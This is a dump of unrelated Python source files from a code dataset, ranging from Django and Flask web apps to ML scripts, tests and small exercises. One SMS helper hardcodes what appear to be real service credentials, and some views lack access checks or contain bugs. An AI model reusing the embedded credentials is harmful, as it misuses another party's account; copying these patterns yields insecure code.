'course': course\n }\n return render(request, 'delete_alert.html', context)\n\ndef delete_course(request, id):\n course = Course.objects.get(id=id)\n course.delete()\n return redirect('/')","sub_path":"courses/app_one/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1523,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"57769298","text":"\"\"\"\nThis module contains tests for \nGET /server/\n\n- Test empty\n- Test few\n- Test no auth\n\"\"\"\n\nfrom pydantic.schema import schema\nfrom tests import Session, TestClient, User\nfrom app import crud, schemas, models\nimport uuid\n\n\ndef create_test_server_schema(number: int) -> schemas.ServerCreate:\n return schemas.ServerCreate(\n name=f\"Test server {number}\",\n hostname=f\"127.0.0.{number}\",\n username=\"root\",\n password=\"12345\",\n pool_key=\"0x0\",\n farmer_key=\"0x0\",\n )\n\n\ndef test_empty(db: Session, client: TestClient, user: User) -> None:\n server_num, _ = crud.server.get_multi(db)\n assert server_num == 0\n\n response = client.get(\"/server/\", headers=user.auth_header)\n assert response.status_code == 200, response.content\n\n table = schemas.Table[schemas.ServerReturn](**response.json())\n assert table.amount == 0\n assert table.items == []\n\n\ndef test_few(db: Session, client: TestClient, user: User) -> None:\n id_order: list[uuid.UUID] = []\n for i, server_create in enumerate(create_test_server_schema(j) for j in range(10)):\n last_created_server = crud.server.create(db, obj_in=server_create)\n id_order.append(last_created_server.id)\n response = client.get(\"/server/\", headers=user.auth_header)\n assert response.status_code == 200, response.content\n\n table = schemas.Table[schemas.ServerReturn](**response.json())\n assert table.amount == i + 1\n amount, servers = crud.server.get_multi(db)\n assert amount == i + 1\n for order_id, server_obj, server_return in zip(id_order, servers, table.items):\n assert server_return == 
schemas.ServerReturn.from_orm(server_obj)\n assert server_obj.id == server_return.id == order_id\n\n\ndef test_no_auth(db: Session, client: TestClient, user: User) -> None:\n response = client.get(\"/server/\")\n assert response.status_code == 401, response.content","sub_path":"tests/server/test_get.py","file_name":"test_get.py","file_ext":"py","file_size_in_byte":1935,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"542693874","text":"import numpy as np\n\ndef pred(X,param):\n\ttheta = param[0]\n\treturn np.dot(X, theta)\n\ndef error(X,Y,param):\n\ttheta = param[0]\n\tn, m = np.shape(X)\n\t# calculate the predicted outputs\n\tpred = np.dot(X, theta)\n\t# calculate the difference between the output and the prediction\n\tloss = pred - Y\n\t# calculate the quadratic error\n\terror = (np.dot(loss.transpose(),loss))/ (2 * n)\n\treturn error\n\ndef normalEq(X,Y,lambdaa):\n\tmodI=np.eye(X.shape[1])\n\tmodI[0][0]=0\n\treturn [np.dot(np.linalg.pinv(np.dot(X.transpose(),X)+lambdaa*modI),np.dot(X.transpose(),Y))]\n","sub_path":"nEq.py","file_name":"nEq.py","file_ext":"py","file_size_in_byte":545,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"139475739","text":"from __future__ import print_function\nimport keras\nfrom keras.datasets import cifar10\nfrom keras.preprocessing.image import ImageDataGenerator\nfrom keras.models import Sequential\nfrom keras.layers import Dense, Dropout, Activation, Flatten\nfrom keras.layers import Conv2D, MaxPooling2D\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport os\n\n\n(x_train, y_train), (x_test, y_test) = cifar10.load_data()\nprint('x_train shape:', x_train.shape)\nprint(x_train.shape[0], 'train samples')\nprint(x_test.shape[0], 'test samples')\n\nx_train = x_train.astype('float32')\nx_test = x_test.astype('float32')\nx_train /= 255\nx_test /= 255\n\nnum_class = 10\n\ny_train = 
keras.utils.to_categorical(y_train,num_class)\ny_test = keras.utils.to_categorical(y_test,num_class)\n\nmodel = Sequential()\n\nmodel.add(Conv2D(32, kernel_size=4, activation='elu', input_shape=(32,32,3),padding='same'))\nmodel.add(Conv2D(32, kernel_size=4, activation='elu', padding='same'))\nmodel.add(MaxPooling2D((2,2), padding='same'))\nmodel.add(Dropout(0.2))\n\nmodel.add(Conv2D(64, kernel_size=4, activation='elu', input_shape=(32,32,3),padding='same'))\nmodel.add(Conv2D(64, kernel_size=4, activation='elu', padding='same'))\nmodel.add(MaxPooling2D((2,2), padding='same'))\nmodel.add(Dropout(0.3))\n\nmodel.add(Conv2D(128, kernel_size=4, activation='elu', input_shape=(32,32,3),padding='same'))\nmodel.add(Conv2D(128, kernel_size=4, activation='elu',padding='same'))\nmodel.add(MaxPooling2D((2,2), padding='same'))\nmodel.add(Dropout(0.5))\n\n\nmodel.add(Flatten())\nmodel.add(Dense(10, activation='softmax'))\nmodel.compile(optimizer='adamax', loss='categorical_crossentropy', metrics=['accuracy'])\n\n\nhistory = model.fit(x_train, y_train, validation_split = 0.2,epochs=100 , batch_size=150)\n\n\nscore = model.evaluate(x_test, y_test, batch_size=128)\nprint(\"score\",score)\nprint(\"Neural network accuracy: %.2f%%\" % (score[1]*100))\n\nmodel.predict(x_test[:4])\n\nprint(y_test[:4])\n\nplt.plot(history.history['val_accuracy'])\nplt.title('model accuracy')\nplt.xlabel('epoch')\nplt.ylabel('accuracy')\nplt.legend(['train', 'test'], loc='upper left')\nplt.show()\n\n\n# serialize model to JSON\nmodel_json = model.to_json()\nwith open(\"model.json\", \"w\") as json_file:\n json_file.write(model_json)\n# serialize weights to HDF5\nmodel.save_weights(\"model.h5\")\nprint(\"Saved model to disk\")\n","sub_path":"TD_IA_Keras/TP_note.py","file_name":"TP_note.py","file_ext":"py","file_size_in_byte":2307,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"54583463","text":"#!/usr/bin/python\nfrom flask import Flask, jsonify, 
abort, make_response, request\n\napp = Flask(__name__)\n\n# Event management\n\nevents = []\n\n\n# Get events\n@app.route('/api/events', methods=['GET'])\ndef get_events():\n return jsonify({'success': True, 'events': events})\n\n\n# Get event by id\n@app.route('/api/events/', methods=['GET'])\ndef get_event(event_id):\n event = filter(lambda e: e['id'] == event_id, events)\n if len(events) == 0:\n abort(404)\n return jsonify({'success': True, 'event': event[0]})\n\n\n# Create event\n@app.route('/api/events', methods=['POST'])\ndef create_event():\n if not request.json or 'name' not in request.json:\n abort(400)\n if events:\n event_id = events[-1]['id'] + 1\n else:\n event_id = 1\n event = {\n 'id': event_id,\n 'name': request.json['name']\n }\n events.append(event)\n return jsonify({'success': True, 'event': event}), 201\n\n\n# Modify event with given id\n@app.route('/api/events/', methods=['PUT'])\ndef update_event(event_id):\n event = filter(lambda t: t['id'] == event_id, events)\n if len(event) == 0:\n abort(404)\n if not request.json:\n abort(400)\n if 'name' in request.json and type(request.json['name']) != unicode:\n abort(400)\n event[0]['name'] = request.json.get('name', event[0]['name'])\n return jsonify({'success': True, 'event': event[0]})\n\n\n# Delete event by id\n@app.route('/api/events/', methods=['DELETE'])\ndef delete_event(event_id):\n event = filter(lambda t: t['id'] == event_id, events)\n if len(event) == 0:\n abort(404)\n events.remove(event[0])\n return jsonify({'success': True})\n\n\n\n# Error handling\n\n@app.errorhandler(404)\ndef not_found(error):\n return make_response(jsonify({'success': False, 'error': 'Not found'}), 404)\n\n\n@app.errorhandler(400)\ndef not_found(error):\n return make_response(jsonify({'success': False, 'error': 'Bad request'}), 400)\n\n\n@app.errorhandler(405)\ndef not_found(error):\n return make_response(jsonify({'success': False, 'error': 'Method not allowed'}), 
405)","sub_path":"listener.py","file_name":"listener.py","file_ext":"py","file_size_in_byte":2108,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"113329084","text":"import tkinter as tk\nimport matplotlib.pyplot as plt\nimport matplotlib.backends.backend_tkagg as agg\nimport inspect\nimport csv \nimport simulator\nimport algo\nimport attack\nimport dialog\n#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Jun 15 18:14:47 2018\n\n@author: Abigail Soward\nA GUI for running one or more simulation. Has default parameters defined, or \nparameters can be set before running. After running, it plots and displays \nthe results, and can export the result data to a CSV.\n\"\"\"\nclass gui(object):\n def __init__(self, master):\n self.init_algos()\n # DEFAULT SIMULATION PARAMETERS\n self.define_algo([\"sybil_control\"])\n self.define_attack(alpha=1/10, size=3333, fractions=(1/2, 1))\n self.data = \"newdatadist.pickle\"\n self.root = master\n self.draw_window()\n \n def start(self):\n # create and run expt.\n self.results = []\n try:\n for alg in self.algos:\n print(\"running {} simulation...\".format(alg.name))\n sim = simulator.simulation(pickled_changes=self.data, algo=alg, attack=self.attack)\n sim.run(verbose=False)\n g_cost, b_cost = sim.get_cumulative_results()\n self.results.append({'data': g_cost, 'label': alg.name+': cost to good ids'})\n self.results.append({'data': b_cost, 'label': alg.name+': cost to adversary'})\n self.plot_results()\n except AttributeError as e:\n print('Error in simulation:', e)\n raise\n except FileNotFoundError as e:\n print('Unable to open data file', self.data)\n except Exception as e:\n print(\"There was an error:\", e)\n raise\n \n def plot_results(self):\n fig = plt.figure()\n ax = fig.add_subplot(111)\n ax.set_yscale('log')\n for graph in self.results:\n ax.plot(graph.get('data'), label=graph.get('label'))\n plt.legend()\n results = agg.FigureCanvasTkAgg(fig, 
master=self.canvas)\n results.draw()\n results.get_tk_widget().pack(side=tk.LEFT)\n \n def export_results(self):\n with open('results.csv', 'w') as csvfile:\n writer = csv.writer(csvfile)\n rows = []\n for graph in self.results:\n rows.append([graph.get('label')] + graph.get(\"data\").tolist())\n rows = zip(*rows) # make rows into cols\n for row in rows:\n writer.writerow(row)\n csvfile.close()\n \n def data_dialog(self):\n window = dialog.dataDialog(self.root, self.data)\n self.data = window.data\n \n def init_algos(self):\n self.options = []\n for name, obj in inspect.getmembers(algo):\n if inspect.isclass(obj) and name is not \"defense_algorithm\": \n self.options.append(name)\n \n def define_algo(self, selected):\n # dynamically create algo objects\n self.algos = []\n self.selected = selected\n for name in selected:\n if name in self.options: self.algos.append(getattr(algo, name)())\n \n def algo_dialog(self):\n w = dialog.algoDialog(self.root, self.options, self.selected)\n self.define_algo(w.selected)\n \n def define_attack(self, alpha, size, fractions):\n self.alpha = alpha\n self.size = size\n self.fractions=fractions\n self.attack = attack.burst(alpha, size, fractions) # attack after first 1/4\n \n def attack_dialog(self):\n w = dialog.attackDialog(self.root, self.alpha, self.size, self.fractions)\n self.define_attack(w.alpha, w.size, (w.start, w.end))\n \n def draw_window(self):\n self.root.title(\"BOOTS\")\n self.root.configure(bg=\"#f4fffd\")\n settings = tk.Frame(self.root, bg=\"#f4fffd\")\n settings.grid(row=0, sticky=\"N\")\n \n actions = tk.Frame(self.root, bg=\"#f4fffd\")\n actions.grid(row=2, sticky=\"S\")\n \n graph = tk.Frame(self.root, width=420, height=280, bg=\"#f4fffd\")\n graph.grid(row=1)\n self.canvas = graph\n \n self.algo_b = tk.Button(settings, text=\"set algo\", bg=\"#d9e2e1\", command=self.algo_dialog)\n self.algo_b.grid(row=0, column=0, sticky=tk.E, padx=10)\n \n self.data_b = tk.Button(settings, text=\"set data\", bg=\"#d9e2e1\", 
command=self.data_dialog)\n self.data_b.grid(row=0, column=1, padx=10)\n \n self.attack_b = tk.Button(settings, text=\"set attack\", bg=\"#d9e2e1\", command=self.attack_dialog)\n self.attack_b.grid(row=0, column=2, sticky=tk.W, padx=10)\n \n self.start_b = tk.Button(actions, text=\"start simulation\", bg=\"#d9e2e1\", fg=\"#6ac417\", command=self.start)\n self.start_b.grid(row=0, column=0, padx=10)\n \n self.export_b = tk.Button(actions, text=\"export\", bg=\"#d9e2e1\", fg=\"#42a1f4\", command=self.export_results)\n self.export_b.grid(row=0, column=1, padx=10)\n \n \n self.quit_b = tk.Button(actions, text=\"quit\", bg=\"#d9e2e1\", fg=\"#c43117\", command=self.root.quit)\n self.quit_b.grid(row=0, column=2, padx=10)\n \n \n# running the gui\nroot = tk.Tk()\ngui = gui(root)\nroot.mainloop()\nroot.destroy()\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5286,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"367199023","text":"import os\nimport sys\nimport time\n\nuse_tqdm = True\n\n# Determine that we're using tqdm or not.\nprint_statement = \"range\"\nif use_tqdm == False:\n print(print_statement)\n for_statement = \"\"\"range(3, len(a))\"\"\"\nelse:\n for_statement = \"\"\"trange(3, len(a), desc = print_statement)\"\"\"\n \n # Import tqdm.\n package_path = os.path.join(os.path.abspath(os.path.dirname(__file__)), \"package\")\n if package_path not in sys.path: sys.path.insert(0, package_path)\n from tqdm import trange\n import colorama\n colorama.deinit()\n\n\n\na = [10, 11, 12, 13, 14]\nfor index in eval(for_statement):\n# print(index)\n time.sleep(1)","sub_path":"Python/function/old/tqdm/range.py","file_name":"range.py","file_ext":"py","file_size_in_byte":633,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"403344917","text":"from django.shortcuts import render, redirect\nfrom django.contrib import messages\nfrom 
django.contrib.auth import get_user_model\nfrom django.contrib.auth.decorators import login_required\nfrom django.http import FileResponse, Http404\n\n\"\"\" STUFF USED FOR SENDING ACTIVATION EMAIL \"\"\"\nfrom django.contrib.sites.shortcuts import get_current_site\nfrom django.core.mail import EmailMessage\nfrom django.template.loader import render_to_string\nfrom django.utils.encoding import force_bytes, force_text\nfrom django.utils.http import urlsafe_base64_encode, urlsafe_base64_decode\nfrom .token_generator import account_activation_token\n\nfrom .models import Teacher, Student, Follower\nfrom .forms import (SailUserCreationForm,\n SailUserUpdateForm,\n TeacherCreationForm,\n StudentCreationForm,\n FollowerCreationForm,\n)\n\nimport os\n\n# Credits to https://blog.hlab.tech/part-ii-how-to-sign-up-user-and-send-confirmation-email-in-django-2-1-and-python-3-6/\ndef _send_register_confirmation_email(request, user, to_email):\n email_subject = 'Activate your Sail Account'\n current_site = get_current_site(request)\n\n message = render_to_string('users/register_activate_email.html', {\n 'user': user,\n 'domain': current_site.domain,\n 'uid': urlsafe_base64_encode(force_bytes(user.pk)),\n 'token': account_activation_token.make_token(user)\n })\n\n email = EmailMessage(email_subject, message, to=[to_email])\n email.send()\n\ndef activate_account(request, uidb64, token):\n try:\n uid = force_bytes(urlsafe_base64_decode(uidb64))\n user = get_user_model().objects.get(pk=uid)\n except(TypeError, ValueError, OverflowError, get_user_model().DoesNotExist):\n user = None\n if user is not None and account_activation_token.check_token(user, token):\n user.is_active = True\n user.save()\n messages.success(request, 'Your account has been activated successfully. 
You may login now!')\n return redirect('users-login')\n else:\n messages.error(request, 'The activation link seems to be invalid!')\n return redirect('sail-home')\n\n\"\"\" Menu to select whether to sign up as teacher or student \"\"\"\ndef register(request):\n return render(request, 'users/register.html', {'title':'Register'})\n\ndef register_teacher(request):\n if request.method == 'POST':\n u_form = SailUserCreationForm(request.POST)\n p_form = TeacherCreationForm(request.POST)\n if u_form.is_valid() and p_form.is_valid():\n user = u_form.save(commit=False)\n user.is_active = False # user is added to our database, but would not be able to login until they activate their account\n user.role = get_user_model().TEACHER\n user.save()\n\n teacher = p_form.save(commit=False)\n teacher.user = user\n teacher.save()\n\n _send_register_confirmation_email(request, user, u_form.cleaned_data['email'])\n\n messages.success(request, 'Account created! You will need to verify your account in your email before you can login.')\n return redirect('users-login')\n else:\n u_form = SailUserCreationForm()\n p_form = TeacherCreationForm()\n \n context = {'u_form':u_form, 'p_form':p_form, 'title':'Teacher Register'}\n return render(request, 'users/register_form.html', context)\n\ndef register_student(request):\n if request.method == 'POST':\n u_form = SailUserCreationForm(request.POST)\n p_form = StudentCreationForm(request.POST)\n if u_form.is_valid() and p_form.is_valid():\n user = u_form.save(commit=False)\n user.is_active = False # user is added to our database, but would not be able to login until they activate their account\n user.role = get_user_model().STUDENT\n user.save()\n\n student = p_form.save(commit=False)\n student.user = user\n student.save()\n\n _send_register_confirmation_email(request, user, u_form.cleaned_data['email'])\n\n messages.success(request, 'Account created! 
You will need to verify your account in your email before you can login.')\n return redirect('users-login')\n else:\n u_form = SailUserCreationForm()\n p_form = StudentCreationForm()\n \n context = {'u_form':u_form, 'p_form':p_form, 'title':'Student Register'}\n return render(request, 'users/register_form.html', context)\n\ndef register_follower(request):\n if request.method == 'POST':\n form = FollowerCreationForm(request.POST)\n if form.is_valid():\n form.save()\n messages.success(request, 'Thank you for your interest in Sail; we will email you updates on the event!')\n return redirect('sail-home')\n else:\n form = FollowerCreationForm()\n \n return render(request, 'users/interest_form.html', {'form':form, 'title':'Interest Form'})\n\n\"\"\" Displays a user's profile, and allows them to update or delete their account \"\"\"\n@login_required\ndef profile(request):\n if request.method == 'POST':\n if request.POST['action'] == 'Update':\n form = SailUserUpdateForm(request.POST, instance=request.user)\n if form.is_valid():\n form.save()\n messages.success(request, 'Account updated!')\n return redirect('users-profile')\n elif request.POST['action'] == 'Delete':\n request.user.delete()\n messages.success(request, 'Account deleted')\n return redirect('sail-home')\n else:\n form = SailUserUpdateForm(instance=request.user)\n\n return render(request, 'users/profile.html', {'form':form, 'title':'Profile'})\n\n\"\"\" Displays and allows participants to e-sign forms/waivers \"\"\"\n@login_required\ndef forms(request):\n if request.method == 'POST':\n if 'submit-participant-form' in request.POST:\n if request.POST.get('full-name') == (f'{request.user.first_name} {request.user.last_name}'):\n messages.success(request, 'Participant form successfully signed!')\n request.user.signed_participant_form = True\n request.user.save()\n else:\n messages.warning(request, 'Your name in the signature form must exactly match your name in your profile.')\n return redirect('users-forms')\n 
elif 'submit-photo-form' in request.POST:\n if request.POST.get('full-name') == (f'{request.user.first_name} {request.user.last_name}'):\n messages.success(request, 'Photo form successfully signed!')\n request.user.signed_photo_form = True\n request.user.save()\n else:\n messages.warning(request, 'Your name in the signature form must exactly match your name in your profile.')\n return redirect('users-forms')\n elif 'unsubmit-participant-form' in request.POST:\n request.user.signed_participant_form = False\n request.user.save()\n elif 'unsubmit-photo-form' in request.POST:\n request.user.signed_photo_form = False\n request.user.save()\n\n return render(request, 'users/forms.html')\n\n@login_required \ndef medical_form_pdf(request):\n curr_dir = os.path.dirname(__file__)\n file_path = os.path.join(curr_dir, './static/users/emergency_medical_form.pdf')\n\n try:\n return FileResponse(open(file_path, 'rb'), content_type='application/pdf')\n except FileNotFoundError:\n raise Http404()\n","sub_path":"users/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":7566,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"534071310","text":"class VendingMachine(object):\n def __init__(self):\n self.machine = {}\n self.balance = 0\n self.stock = 0\n\n def vend(self,product):\n if product not in self.machine:\n return \"{0} is out of Stock\".format(product)\n elif self.balance0:\n return \"Here is your {0} and ${1} remain.\".format(product,self.balance)\n else:\n return \"Here is your {0}\".format(product)\n\n def restock(self,product,stock,price):\n self.machine[product]=[stock,price]\n return \"Current {0} stock:{1}\".format(product,self.machine[product])\n\n def deposit(self,money):\n if not self.machine:\n return \"Machine is out of stock Here is your ${0}\".format(money)\n else:\n self.balance += money\n return \"Your balance is ${0}\".format(self.balance)\n\n def return_money(self):\n if self.balance>0:\n 
change = self.balance\n self.balance = 0\n return \"Here is your money ${0}\".format(change)\n elif self.balance==0:\n return \"You don't have balance\"\n","sub_path":"vending_machine_practice.py","file_name":"vending_machine_practice.py","file_ext":"py","file_size_in_byte":1465,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"214444700","text":"import string\ndef print_rangoli(size):\n n = size\n alph = string.ascii_lowercase\n width = 4*n-3\n\n ans = []\n for i in range(n):\n left = '-'.join(alph[n-i-1:n])\n mid = left[-1:0:-1]+left\n final = mid.center(width,'-')\n ans.append(final)\n\n if len(ans) > 1:\n for i in ans[n-2::-1]:\n ans.append(i)\n ans= '\\n'.join(ans)\n print(ans)\n\nif __name__ == '__main__':\n n = int(input())\n print_rangoli(n)\n\n","sub_path":"97.py","file_name":"97.py","file_ext":"py","file_size_in_byte":466,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"424404423","text":"\n\n#calss header\nclass _TWEET():\n\tdef __init__(self,): \n\t\tself.name = \"TWEET\"\n\t\tself.definitions = [u'a short, high sound made by a bird', u'a short remark or piece of information published on Twitter\\u2122']\n\n\t\tself.parents = []\n\t\tself.childen = []\n\t\tself.properties = []\n\t\tself.jsondata = {}\n\n\n\t\tself.specie = 'nouns'\n\n\n\tdef run(self, obj1 = [], obj2 = []):\n\t\treturn self.jsondata\n","sub_path":"xai/brain/wordbase/nouns/_tweet.py","file_name":"_tweet.py","file_ext":"py","file_size_in_byte":382,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"146346694","text":"from ssrnai.models.organisms import Organisms\nfrom ssrnai.models.percevejo.percevejo_gene_information import Percevejo_Gene_Information\nfrom django.db import models\nfrom projeto.models.template import TemplateModelMixin\n\nclass Percevejo_Off_Targets(models.Model, TemplateModelMixin):\n\n organism = 
models.ForeignKey(Organisms(\"organism_id\"), null=True, blank=True, on_delete=models.SET_NULL)\n gene = models.ForeignKey(Percevejo_Gene_Information(\"gene_id\"), null=True, blank=True, on_delete=models.SET_NULL)\n fragment_seq = models.TextField((\"fragment_seq\"))\n start = models.IntegerField(\"start\")\n end = models.IntegerField((\"end\"))\n hits = models.IntegerField(\"hits\")\n hits_description = models.TextField((\"hits_description\"))\n\n\n class Meta:\n ordering = ['id']\n verbose_name = 'offtarget'\n verbose_name_plural = 'offtargets'\n\n def __str__(self):\n return '%s' % (self.id)\n","sub_path":"ssrnai/models/percevejo/percevejo_off_targets.py","file_name":"percevejo_off_targets.py","file_ext":"py","file_size_in_byte":925,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"225568481","text":"from discord.ext import commands\nfrom .utils import checks\nimport discord\nimport asyncio\nfrom bs4 import BeautifulSoup\nimport urllib.request\nimport datetime\n\nclass Star_Citizen:\n \"\"\"All of the Star Citizen related commands\"\"\"\n \n def __init__(self, bot):\n self.bot = bot\n \n @commands.command()\n async def ben(self):\n \"\"\"Dancing Ben\"\"\"\n await self.bot.say('http://i.imgur.com/OLKOQ6H.gif')\n \n @commands.command()\n async def scam(self):\n \"\"\"Shows that Star Citizen is a scam\"\"\"\n await self.bot.say('Star Citizen is a scam, confirmed by Chris Roberts himself: http://i.imgur.com/UK3D1c0.gifv')\n \n @commands.command(name='2.4')\n async def two_four(self):\n \"\"\"Shows the progress of 2.4\"\"\"\n await self.bot.say('It\\'s not just a meme! 
http://i.imgur.com/umBUjqW.gif')\n\n @commands.command()\n async def countdown(self):\n \"\"\"Countdown to Citizencon \\N{SMILE}\"\"\"\n utc_now = datetime.datetime.utcnow()\n citizencon_utc = datetime.datetime.utcfromtimestamp(1476050400)\n time_delta = citizencon_utc - utc_now\n hours = time_delta.seconds // 3600\n minutes = (time_delta.seconds % 3600) // 60\n seconds = time_delta.seconds % 60\n citizencon_countdown = 'Citizencon is in:\\n`{} Days, {} Hours, {} Minutes, {} Seconds`'\n citizencon_countdown = citizencon_countdown.format(time_delta.days, hours, minutes, seconds)\n await self.bot.say(citizencon_countdown)\n \ndef setup(bot):\n bot.add_cog(Star_Citizen(bot))","sub_path":"cogs/star_citizen.py","file_name":"star_citizen.py","file_ext":"py","file_size_in_byte":1562,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"324763130","text":"import os\nfrom setuptools import setup, find_packages\n\ndef read(fname):\n return open(os.path.join(os.path.dirname(__file__), fname)).read()\n\nsetup(\n name=\"collect\",\n version=\"0.1.1\",\n author=\"Philipp Bosch\",\n author_email=\"hello@pb.io\",\n packages=find_packages(),\n url=\"http://collect.io/libraries/python/\",\n license=\"http://philippbosch.mit-license.org/\",\n description=\"Python library for collecting data at collect.io\",\n long_description=read('README.md'),\n test_suite=\"collect.tests.get_suite\",\n classifiers=[\n \"Development Status :: 3 - Alpha\",\n \"License :: OSI Approved :: MIT License\",\n \"Intended Audience :: Science/Research\",\n \"Programming Language :: Python :: 2.7\",\n \"Topic :: Database\",\n \"Topic :: Scientific/Engineering :: Information Analysis\",\n \"Topic :: Scientific/Engineering :: Visualization\",\n \"Topic :: Utilities\",\n ],\n install_requires=[\n \"couchdbkit>=0.5.7\",\n 
],\n)","sub_path":"pypi_install_script/collect-0.1.1.tar/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":993,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"297556768","text":"import json\n\nfrom ronglian_sms_sdk import SmsSDK\n\naccId = '8aaf0708780055cd0178d32e770f4fc6'\naccToken = '0b7fe4917cf7487f89d8dcfbd68d80f8'\nappId = '8aaf0708780055cd0178d32e77db4fcd'\n\n\n\nclass Sms:\n def __new__(cls, *args, **kwargs):\n if not hasattr(Sms, \"_instance\"):\n cls._instance = super().__new__(cls, *args, **kwargs)\n # 创建一个SmsSDK对象 这里只执行一次 所以SmsSDK对象只有一个\n cls._instance.sms_sdk = SmsSDK(accId, accToken, appId)\n return cls._instance\n\n def send_message(self, mobile='15532272912', datas=(111111,5), tid=\"1\"):\n # tid = '容联云通讯创建的模板'\n # mobile = '手机号1,手机号2'\n # datas = ('变量1', '变量2')\n\n resp = self.sms_sdk.sendMessage(tid, mobile, datas)\n resp_dict = json.loads(resp)\n print('>>>>>>>>短信函数')\n # {\"statusCode\":\"000000\",\"templateSMS\":{\"smsMessageSid\":\"04983ea5ab374e95b84eece5f43e1f08\",\"dateCreated\":\"20210415091559\"}}\n if resp_dict.get(\"statusCode\") == \"000000\":\n print(\"发送短信成功\")\n return 0\n else:\n print(\"发送短信失败\")\n return 1\n\n\n\n # print(resp)\n\n\nif __name__ == '__main__':\n\n Sms().send_message()\n","sub_path":"utils/sms/SendMessage.py","file_name":"SendMessage.py","file_ext":"py","file_size_in_byte":1278,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"358802946","text":"class RouteRegistrar():\n passthru = [\n 'get', 'post', 'put', 'patch', 'delete', 'options', 'any',\n ]\n\n allowedAttributes = [\n 'as', 'domain', 'Middleware', 'name', 'namespace', 'prefix', 'where',\n ]\n\n def __init__(self, router):\n self.router = router\n self.attributes = {\n 'action': str(),\n 'prefix':\n '/' + router.buildStack['prefix'][-1].strip('/')\n if 'prefix' in router.buildStack.keys() and len(router.buildStack['prefix'])\n 
else '',\n 'namespace':\n router.buildStack['namespace'][-1]\n if 'namespace' in router.buildStack.keys() and len(router.buildStack['namespace'])\n else '',\n # 用list对middleware进行一次浅拷贝,避免当前对象attributes['Middleware']和router的buildStack['Middleware']指向同一地址造成重复加载中间件\n 'Middleware':\n list(router.buildStack['Middleware'][-1])\n if 'Middleware' in router.buildStack.keys() and len(router.buildStack['Middleware'])\n else list()\n }\n\n def setAttributes(self, attributes):\n if 'prefix' in attributes.keys():\n prefix = attributes['prefix'].strip('/')\n if prefix:\n self.attributes['prefix'] += '/%s' % prefix\n\n if 'namespace' in attributes.keys() and attributes['namespace']:\n if self.attributes['namespace']:\n self.attributes['namespace'] += '.%s' % attributes['namespace']\n else:\n self.attributes['namespace'] += attributes['namespace']\n\n if 'Middleware' in attributes.keys() and len(attributes['Middleware']) > 0:\n self.attributes['Middleware'] += attributes['Middleware']\n\n return self\n\n def attribute(self, key, value):\n self.attributes[key] = value\n\n def get(self, uri, action):\n self.attribute('action', action)\n uri = self.attributes['prefix'] + '/' + uri.strip('/')\n return self.router.get(uri, self.attributes)\n\n def post(self, uri, action):\n self.attribute('action', action)\n uri = self.attributes['prefix'] + '/' + uri.strip('/')\n return self.router.post(uri, self.attributes)\n","sub_path":"laravel/Routing/RouteRegistrar.py","file_name":"RouteRegistrar.py","file_ext":"py","file_size_in_byte":2296,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"3951463","text":"import pytest\n\nimport numpy as np\n\nfrom cloudvolume.chunks import encode, decode\n\ndef encode_decode(data, format):\n encoded = encode(data, format)\n result = decode(encoded, format, shape=(64,64,64,1), dtype=np.uint8)\n\n assert np.all(result.shape == data.shape)\n assert np.all(data == result)\n\n\ndef test_raw():\n random_data = 
np.random.randint(255, size=(64,64,64,1), dtype=np.uint8)\n encode_decode(random_data, 'raw')\n\ndef test_npz():\n random_data = np.random.randint(255, size=(64,64,64,1), dtype=np.uint8)\n encode_decode(random_data, 'npz')\n\ndef test_jpeg():\n data = np.zeros(shape=(64,64,64,1), dtype=np.uint8)\n encode_decode(data, 'jpeg')\n encode_decode(data + 255, 'jpeg')\n\n # Random jpeg won't decompress to exactly the same image\n # but it should have nearly the same average power\n random_data = np.random.randint(255, size=(64,64,64,1), dtype=np.uint8)\n pre_avg = random_data.copy().flatten().mean()\n encoded = encode(random_data, 'jpeg')\n decoded = decode(encoded, 'jpeg', shape=(64,64,64,1), dtype=np.uint8)\n post_avg = decoded.copy().flatten().mean()\n\n assert abs(pre_avg - post_avg) < 1\n\n","sub_path":"test/test_chunks.py","file_name":"test_chunks.py","file_ext":"py","file_size_in_byte":1120,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"258766319","text":"import requests\r\nfrom bs4 import BeautifulSoup\r\nimport os\r\nfrom functools import partial\r\nimport multiprocessing \r\nfrom multiprocessing import Pool\r\n\r\ndef fetch(url):\r\n\theaders={'User-Agent': \"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36\"}\r\n\tresp=requests.get(url,headers=headers).text\r\n\treturn resp\r\n\r\ndef 